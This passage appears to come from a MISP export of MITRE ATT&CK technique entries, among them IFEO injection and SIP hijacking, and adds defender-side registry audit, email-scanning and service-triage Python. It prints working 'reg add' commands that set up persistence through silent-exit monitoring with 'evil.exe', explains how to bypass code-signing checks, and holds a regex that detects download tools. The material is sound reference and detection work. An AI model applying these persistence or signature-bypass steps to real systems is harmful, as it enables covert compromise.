Associated metadata
Metadata key Value
external_id T1431

Image File Execution Options Injection - T1183

Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., “C:\dbg\ntsd.exe -g notepad.exe”). (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable>, where <executable> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)

An example where the evil.exe process is started when notepad.exe exits: (Citation: Oddvar Moe IFEO APR 2018)

  • reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
  • reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
  • reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"

Similar to Process Injection, these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous invocation.

Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)
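A defender-side audit of the two Registry locations this entry describes, added here as an example that is not part of the ATT&CK or MISP content. It parses a .reg export (the format `reg export` writes), reports every Debugger value under Image File Execution Options, and reports every image whose GlobalFlag has the 0x200 (512) bit set together with the MonitorProcess value found under the matching SilentProcessExit key. The export below is constructed; it reuses the image name, flag value and monitor path from the commands above, adds a second image with an attached debugger, and adds a benign entry that carries only a mitigation setting and must not be flagged.

```python
import re
from typing import Dict, List, Optional, Tuple

IFEO_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
SPE_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit"
# GlobalFlag bit that enables silent-process-exit monitoring: 0x200 == 512, the value set in the example above.
FLG_MONITOR_SILENT_PROCESS_EXIT = 0x200

# Constructed .reg export, not taken from a real host.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe]
"Debugger"="C:\\dbg\\ntsd.exe -g"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000200

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe]
"MitigationOptions"=hex(b):00,01,00,00,00,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe]
"ReportingMode"=dword:00000001
"MonitorProcess"="C:\\temp\\evil.exe"
'''


def _decode_value(raw: str) -> object:
    """Decode the two value syntaxes this audit needs (dword and quoted string); other types stay raw."""
    if raw.startswith("dword:"):
        return int(raw[len("dword:"):], 16)
    if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
        # .reg files escape backslashes and double quotes inside string values
        return raw[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    return raw


def parse_reg_export(text: str) -> Dict[str, Dict[str, object]]:
    """Map every key path in a .reg export to its {value name: decoded value} dict."""
    keys: Dict[str, Dict[str, object]] = {}
    current: Optional[str] = None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = re.match(r'^"([^"]+)"=(.*)$', line)
        if m and current is not None:
            keys[current][m.group(1)] = _decode_value(m.group(2))
    return keys


def _value(values: Dict[str, object], name: str) -> object:
    """Registry value names are case-insensitive, so look them up that way."""
    for k, v in values.items():
        if k.lower() == name.lower():
            return v
    return None


def audit_ifeo(keys: Dict[str, Dict[str, object]]) -> List[Tuple[str, str, str]]:
    """Return (finding, image name, target) for every Debugger value and every armed silent-exit monitor."""
    lower = {k.lower(): v for k, v in keys.items()}
    ifeo_prefix = IFEO_KEY.lower() + "\\"
    spe_prefix = SPE_KEY.lower() + "\\"
    findings: List[Tuple[str, str, str]] = []
    for path, values in lower.items():
        if not path.startswith(ifeo_prefix):
            continue
        image = path[len(ifeo_prefix):]
        debugger = _value(values, "Debugger")
        if debugger:
            findings.append(("debugger", image, str(debugger)))
        flags = _value(values, "GlobalFlag")
        if isinstance(flags, int) and flags & FLG_MONITOR_SILENT_PROCESS_EXIT:
            # The flag alone runs nothing; the program to launch lives under the matching SilentProcessExit key.
            monitor = _value(lower.get(spe_prefix + image, {}), "MonitorProcess")
            findings.append(("silent_exit_monitor", image, str(monitor) if monitor else "<no MonitorProcess set>"))
    return findings


if __name__ == "__main__":
    for finding in audit_ifeo(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(finding)
```

To run it against a real host, export both keys with `reg export` (one file each, then concatenate) and pass the text to parse_reg_export; every Debugger value deserves a look, since legitimate uses outside developer workstations are rare, and a GlobalFlag of 0x200 paired with a MonitorProcess outside a known product directory is the pattern the example commands above produce.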

Internal MISP references

UUID 62166220-e498-410f-a90a-19d4339d4e99 which can be used as unique global reference for Image File Execution Options Injection - T1183 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1183
kill_chain ['attack-Windows:privilege-escalation', 'attack-Windows:persistence', 'attack-Windows:defense-evasion']
mitre_platforms ['Windows']

SIP and Trust Provider Hijacking - T1198

In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)

Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)

Similar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)

  • Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node]\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
  • Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node]\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
  • Modifying the DLL and Function Registry values in HKLM\SOFTWARE[\WOW6432Node]\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
  • Note: The above hijacks are also possible without modifying the Registry via DLL Search Order Hijacking.

Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
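A baseline comparison for the three Registry locations listed above, added here as an example that is not part of the ATT&CK or MISP content. Each SIP function key holds a DLL name and an exported function name (Dll/FuncName for SIPs, $DLL/$Function for trust providers), so the check is to compare the observed pair against a known-good pair and to look at where a changed DLL actually lives. The baseline values are the stock ones as I recall them from a clean Windows host and are an assumption; record your own from a reference machine. The observed values are constructed: one SIP is redirected to a DLL in a user-writable directory, one to an invented export of an invented DLL under System32 (the "already present DLL" variant the text describes), and the rest are unchanged.

```python
from typing import Dict, List, Tuple

# Registry roots named in the technique text (64-bit view; audit the WOW6432Node view the same way).
SIP_ROOT = r"HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0"
TRUST_ROOT = r"HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy"
PE_SIP = "{C689AAB8-8E78-11D0-8C47-00C04FC295EE}"           # Portable Executable SIP
PS_SIP = "{603BCC1F-4B59-4E08-B724-D2C6297EF351}"           # PowerShell SIP
AUTHENTICODE_V2 = "{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}"  # WINTRUST_ACTION_GENERIC_VERIFY_V2 trust provider

Entry = Tuple[str, str]  # (DLL value, function-name value)


def sip_key(func: str, sip_guid: str) -> str:
    return "\\".join((SIP_ROOT, func, sip_guid))


def trust_key(provider_guid: str) -> str:
    return "\\".join((TRUST_ROOT, provider_guid))


# Known-good pairs. Assumption: stock values on a clean host; replace with your own recorded baseline.
BASELINE: Dict[str, Entry] = {
    sip_key("CryptSIPDllGetSignedDataMsg", PE_SIP): ("WINTRUST.DLL", "CryptSIPGetSignedDataMsg"),
    sip_key("CryptSIPDllVerifyIndirectData", PE_SIP): ("WINTRUST.DLL", "CryptSIPVerifyIndirectData"),
    sip_key("CryptSIPDllVerifyIndirectData", PS_SIP):
        (r"C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll", "PsVerifyHash"),
    trust_key(AUTHENTICODE_V2): ("WINTRUST.DLL", "SoftpubAuthenticode"),
}

# Constructed observation of the same keys on a host under review.
OBSERVED: Dict[str, Entry] = {
    sip_key("CryptSIPDllGetSignedDataMsg", PE_SIP): ("WINTRUST.DLL", "CryptSIPGetSignedDataMsg"),
    # dropped DLL in a user-writable directory (constructed names)
    sip_key("CryptSIPDllVerifyIndirectData", PE_SIP): (r"C:\ProgramData\sipstub.dll", "AlwaysTrue"),
    # redirection to an export of a DLL that is already on disk (constructed names)
    sip_key("CryptSIPDllVerifyIndirectData", PS_SIP): (r"C:\Windows\System32\example.dll", "SomeExport"),
    trust_key(AUTHENTICODE_V2): ("WINTRUST.DLL", "SoftpubAuthenticode"),
}


def _in_system_dir(dll: str) -> bool:
    """Bare names resolve through the loader's search order; full paths are checked against System32."""
    if "\\" not in dll:
        return True
    return dll.lower().startswith(r"c:\windows\system32" + "\\")


def audit_sip_trust(observed: Dict[str, Entry], baseline: Dict[str, Entry]) -> List[Dict[str, str]]:
    """Report every key whose DLL or function differs from the baseline, and baseline keys that vanished."""
    findings: List[Dict[str, str]] = []
    for key, (dll, func) in observed.items():
        expected = baseline.get(key)
        if expected is None:
            findings.append({"key": key, "issue": "not in baseline", "dll": dll, "func": func})
            continue
        exp_dll, exp_func = expected
        if dll.lower() != exp_dll.lower():
            issue = "dll changed" + ("" if _in_system_dir(dll) else ", outside System32")
            findings.append({"key": key, "issue": issue, "dll": dll, "func": func})
        elif func != exp_func:
            findings.append({"key": key, "issue": "function changed", "dll": dll, "func": func})
    for key in baseline:
        if key not in observed:
            findings.append({"key": key, "issue": "baseline entry missing", "dll": "", "func": ""})
    return findings


if __name__ == "__main__":
    for finding in audit_sip_trust(OBSERVED, BASELINE):
        print(finding)
```

A DLL change that stays inside System32 is still a finding, because the page's "already present DLL" variant never drops a file; pairing the Registry comparison with a signature check of the named DLL itself is what separates a Windows update from a redirect.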

Internal MISP references

UUID 72b5ef57-325c-411b-93ca-a3ca6fa17e31 which can be used as unique global reference for SIP and Trust Provider Hijacking - T1198 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1198
kill_chain ['attack-Windows:defense-evasion', 'attack-Windows:persistence']
mitre_platforms ['Windows']

File and Directory Permissions Modification - T1222

Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).

Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, Unix Shell Configuration Modification, or tainting/hijacking other instrumental binary/configuration files via Hijack Execution Flow.

Adversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.(Citation: new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: fsutil_behavior)

Internal MISP references

UUID 65917ae0-b854-4139-83fe-bf2441cf0196 which can be used as unique global reference for File and Directory Permissions Modification - T1222 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1222
kill_chain ['attack-Linux:defense-evasion', 'attack-Windows:defense-evasion', 'attack-macOS:defense-evasion']
mitre_data_sources ['Active Directory: Active Directory Object Modification', 'Command: Command Execution', 'File: File Metadata', 'Process: Process Creation']
mitre_platforms ['Linux', 'Windows', 'macOS']

Assess leadership areas of interest - T1224

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Leadership assesses the areas of most interest to them and generates Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ). For example, an adversary knows from open and closed source reporting that cyber is of interest, resulting in it being a KIT. (Citation: ODNIIntegration)

Internal MISP references

UUID d3999268-740f-467e-a075-c82e2d04be62 which can be used as unique global reference for Assess leadership areas of interest - T1224 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1224
kill_chain ['pre-attack:priority-definition-planning']

Determine 3rd party infrastructure services - T1284

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available as 3rd party infrastructure services. These services could provide an adversary with another avenue of approach or compromise. (Citation: LUCKYCAT2012) (Citation: Schneier-cloud) (Citation: Computerworld-suppliers)

Internal MISP references

UUID dfa4eaf4-50d9-49de-89e9-d33f579f3e05 which can be used as unique global reference for Determine 3rd party infrastructure services - T1284 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1284
kill_chain ['pre-attack:organizational-information-gathering']

Determine highest level tactical element - T1243

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

From a tactical viewpoint, an adversary could potentially have a primary and secondary level target. The primary target represents the highest level tactical element the adversary wishes to attack. For example, the corporate network within a corporation or the division within an agency. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

Internal MISP references

UUID dc7dfc9f-be1b-4e6e-a2e6-9a9bb2400ec9 which can be used as unique global reference for Determine highest level tactical element - T1243 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1243
kill_chain ['pre-attack:target-selection']

Determine secondary level tactical element - T1244

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

The secondary level tactical element the adversary seeks to attack is the specific network or area of a network that is vulnerable to attack. Within the corporate network example, the secondary level tactical element might be a SQL server or a domain controller with a known vulnerability. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

Internal MISP references

UUID b9148981-152a-4a19-95c1-962803f5c9af which can be used as unique global reference for Determine secondary level tactical element - T1244 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1244
kill_chain ['pre-attack:target-selection']

Attack PC via USB Connection - T1427

With escalated privileges, an adversary could program the mobile device to impersonate USB devices such as input devices (keyboard and mouse), storage devices, and/or networking devices in order to attack a physically connected PC. (Citation: Wang-ExploitingUSB) (Citation: ArsTechnica-PoisonTap) This technique has been demonstrated on Android. We are unaware of any demonstrations on iOS.

Internal MISP references

UUID a0464539-e1b7-4455-a355-12495987c300 which can be used as unique global reference for Attack PC via USB Connection - T1427 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1427
kill_chain ['mobile-attack-Android:lateral-movement']
mitre_platforms ['Android']

Determine centralization of IT management - T1285

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

This involves determining whether a "corporate" help desk exists, the degree of access and control it has, and whether there are "edge" units that may have different support processes and standards. (Citation: SANSCentratlizeManagement)

Internal MISP references

UUID a7dff5d5-99f9-4a7e-ac54-a64113c28121 which can be used as unique global reference for Determine centralization of IT management - T1285 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1285
kill_chain ['pre-attack:organizational-information-gathering']

Determine external network trust dependencies - T1259

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Network trusts enable communications between different networks with specific accesses and permissions. Network trusts could include the implementation of domain trusts or the use of virtual private networks (VPNs). (Citation: CuckoosEgg) (Citation: CuckoosEggWikipedia) (Citation: KGBComputerMe)

Internal MISP references

UUID a2fc93cd-e371-4755-9305-2615b6753d91 which can be used as unique global reference for Determine external network trust dependencies - T1259 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1259
kill_chain ['pre-attack:technical-information-gathering']

Analyze organizational skillsets and deficiencies - T1297

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Understanding organizational skillsets and deficiencies could provide insight into weaknesses in defenses, or opportunities for exploitation. (Citation: FakeLinkedIn)

Internal MISP references

UUID 96eb59d1-6c46-44bb-bfcd-56be02a00d41 which can be used as unique global reference for Analyze organizational skillsets and deficiencies - T1297 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1297
kill_chain ['pre-attack:people-weakness-identification']

Analyze architecture and configuration posture - T1288

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

An adversary may analyze technical scanning results to identify weaknesses in the configuration or architecture of a victim network. These weaknesses could include architectural flaws, misconfigurations, or improper security controls. (Citation: FireEyeAPT28)

Internal MISP references

UUID 87775365-2081-4b6e-99bd-48a3b8f36563 which can be used as unique global reference for Analyze architecture and configuration posture - T1288 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1288
kill_chain ['pre-attack:technical-weakness-identification']

Analyze organizational skillsets and deficiencies - T1289

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Analyze strengths and weaknesses of the target for potential areas on which to focus compromise efforts. (Citation: FakeLinkedIn)

Internal MISP references

UUID 092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc which can be used as unique global reference for Analyze organizational skillsets and deficiencies - T1289 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1289
kill_chain ['pre-attack:technical-weakness-identification']

Leverage compromised 3rd party resources - T1375

This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.

The utilization of resources not owned by the adversary to launch exploits or operations. This includes utilizing equipment that was previously compromised or leveraging access gained by other methods (such as compromising an employee at a business partner location). (Citation: CitizenLabGreatCannon)

Internal MISP references

UUID 2c8a9df4-52a9-4770-94b3-5e95ab7d59f9 which can be used as unique global reference for Leverage compromised 3rd party resources - T1375 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1375
kill_chain ['pre-attack:launch']

Procure required equipment and software - T1335

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

An adversary will require some physical hardware and software. They may only need a lightweight set-up if most of their activities will take place using on-line infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems. (Citation: NYTStuxnet)

Internal MISP references

UUID 2141aea0-cf38-49aa-9e51-ac34092bc30a which can be used as unique global reference for Procure required equipment and software - T1335 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1335
kill_chain ['pre-attack:establish-&-maintain-infrastructure']

SSL certificate acquisition for domain - T1337

This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.

Certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. Acquiring a certificate for a domain name similar to one that is expected to be trusted may allow an adversary to trick a user into trusting the domain (e.g., vvachovia instead of Wachovia -- homoglyphs). (Citation: SubvertSSL) (Citation: PaypalScam)

Internal MISP references

UUID e34b9ca1-8778-41a3-bba5-8edaab4076dc which can be used as unique global reference for SSL certificate acquisition for domain - T1337 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1337
kill_chain ['pre-attack:establish-&-maintain-infrastructure']

Confirmation of launched compromise achieved - T1383

This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.

Upon successful compromise the adversary may implement methods for confirming success including communication to a command and control server, exfiltration of data, or a verifiable intended effect such as a publicly accessible resource being inaccessible or a web page being defaced. (Citation: FireEye Malware Stages) (Citation: APTNetworkTrafficAnalysis)

Internal MISP references

UUID f4c5d1d9-8f0e-46f1-a9fa-f9a440926046 which can be used as unique global reference for Confirmation of launched compromise achieved - T1383 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1383
kill_chain ['pre-attack:compromise']

App Delivered via Email Attachment - T1434

The application is delivered as an email attachment.

Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted, known insecure, or malicious apps on devices. Enterprise email security solutions can identify the presence of Android or iOS application packages within email messages.

Platforms: Android, iOS
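The detection note above says an email security solution can identify Android or iOS application packages inside messages. The check has to be content-based, because the sender controls both the filename and the declared Content-Type. Below is an added example written for this page (not MITRE or MISP code) that identifies APKs by the presence of AndroidManifest.xml and IPAs by the Payload/<name>.app/ layout, both of which are ZIP archives; the message and attachments are constructed inline, and the function names are this example's own.

```python
import io
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser
from typing import Optional

def classify_package(data: bytes) -> Optional[str]:
    """Recognise Android (APK) and iOS (IPA) app packages by their ZIP contents,
    ignoring filename and Content-Type, both of which the sender controls.
    Nested archives (an .apk inside a .zip) are not descended into here."""
    if not data.startswith(b"PK\x03\x04"):
        return None
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
    except zipfile.BadZipFile:
        return None
    if "AndroidManifest.xml" in names:
        return "android-apk"
    if any(n.startswith("Payload/") and ".app/" in n for n in names):
        return "ios-ipa"
    return None

def scan_message(raw: bytes) -> list:
    """Return (filename, verdict) for every attachment that is a mobile app package."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    hits = []
    for part in msg.iter_attachments():
        payload = part.get_payload(decode=True)
        if isinstance(payload, bytes):
            verdict = classify_package(payload)
            if verdict:
                hits.append((part.get_filename() or "<unnamed>", verdict))
    return hits

def make_zip(entries: dict) -> bytes:
    """Build an in-memory ZIP from {name: bytes}; used only for the sample data."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()

def build_sample_message() -> bytes:
    """Constructed test message: a minimal APK renamed to .zip, a minimal IPA,
    and a benign Word document (also a ZIP) that must not be flagged."""
    apk = make_zip({"AndroidManifest.xml": b"<manifest/>", "classes.dex": b"dex\n035\x00",
                    "META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n"})
    ipa = make_zip({"Payload/Expenses.app/Info.plist": b"<plist/>",
                    "Payload/Expenses.app/Expenses": b"\xcf\xfa\xed\xfe"})
    docx = make_zip({"[Content_Types].xml": b"<Types/>", "word/document.xml": b"<w:document/>"})
    msg = EmailMessage()
    msg["From"] = "it-support@example.test"
    msg["To"] = "staff@example.test"
    msg["Subject"] = "Expense app update"
    msg.set_content("Please install the attached update on your phone.")
    msg.add_attachment(apk, maintype="application", subtype="zip", filename="update.zip")
    msg.add_attachment(ipa, maintype="application", subtype="octet-stream", filename="Expenses.ipa")
    msg.add_attachment(docx, maintype="application",
                       subtype="vnd.openxmlformats-officedocument.wordprocessingml.document",
                       filename="policy.docx")
    return msg.as_bytes()

if __name__ == "__main__":
    for filename, verdict in scan_message(build_sample_message()):
        print(f"{filename}: {verdict}")
```

The disguised update.zip is caught because the check looks at the archive members rather than the extension; the .docx, which is also a ZIP, is left alone.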

Internal MISP references

UUID 1f96d624-8409-4472-ad8a-30618ee6b2e2 which can be used as unique global reference for App Delivered via Email Attachment - T1434 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id T1434

Create or Modify System Process - T1543

Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.(Citation: TechNet Services) On macOS, launchd processes known as Launch Daemon and Launch Agent are run to finish system initialization and load user specific parameters.(Citation: AppleDocs Launch Agent Daemons)

Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.

Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.(Citation: OSX Malware Detection)
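The three paragraphs above describe new services/daemons/agents, modified existing ones, and the privilege gap between who creates a service and who it runs as. A triage routine over service-creation and service-modification records can check all three. The following is an added example for this page, not MITRE or MISP code: the record schema, the directory and interpreter lists, the golden-image baseline and the sample events are all constructed assumptions of the example (the Windows records are shaped after the fields of System log event 7045, but nothing here is read from a real log).

```python
import re
import shlex
from dataclasses import dataclass

@dataclass
class ServiceEvent:
    """Constructed schema: one record per service/daemon/agent creation or change,
    normalized from whatever the source logs (Windows System event 7045, a unit
    file audit, a launchd plist diff). Field names are this example's own."""
    platform: str   # "windows" | "linux" | "macos"
    name: str
    command: str    # ImagePath / ExecStart / ProgramArguments as one string
    account: str    # account the service runs as, e.g. "LocalSystem", "root"

# Directories an unprivileged user can normally write to. A service that runs as
# root/SYSTEM from one of these lets that user run code at that privilege.
WRITABLE_DIRS = {
    "windows": ("\\users\\", "\\programdata\\", "\\temp\\", "\\appdata\\", "\\windows\\temp\\"),
    "linux": ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/"),
    "macos": ("/tmp/", "/private/tmp/", "/var/tmp/", "/users/"),
}
# Interpreters and proxies: when the image is one of these, the arguments, not
# the binary, decide what actually runs.
INTERPRETERS = {
    "windows": {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"},
    "linux": {"sh", "bash", "dash", "python", "python3", "perl"},
    "macos": {"sh", "bash", "zsh", "osascript", "python3"},
}
PRIVILEGED = {"localsystem", "nt authority\\system", "system", "root"}
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget|invoke-webrequest|iwr|downloadstring|certutil\s+-urlcache)\b", re.I)
ENCODED = re.compile(r"(\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}|base64\s+(-d|--decode)|frombase64string)", re.I)

def split_command(command: str, platform: str) -> list:
    """First token is the executable. Windows service paths honour only double
    quotes; POSIX platforms follow shell quoting rules."""
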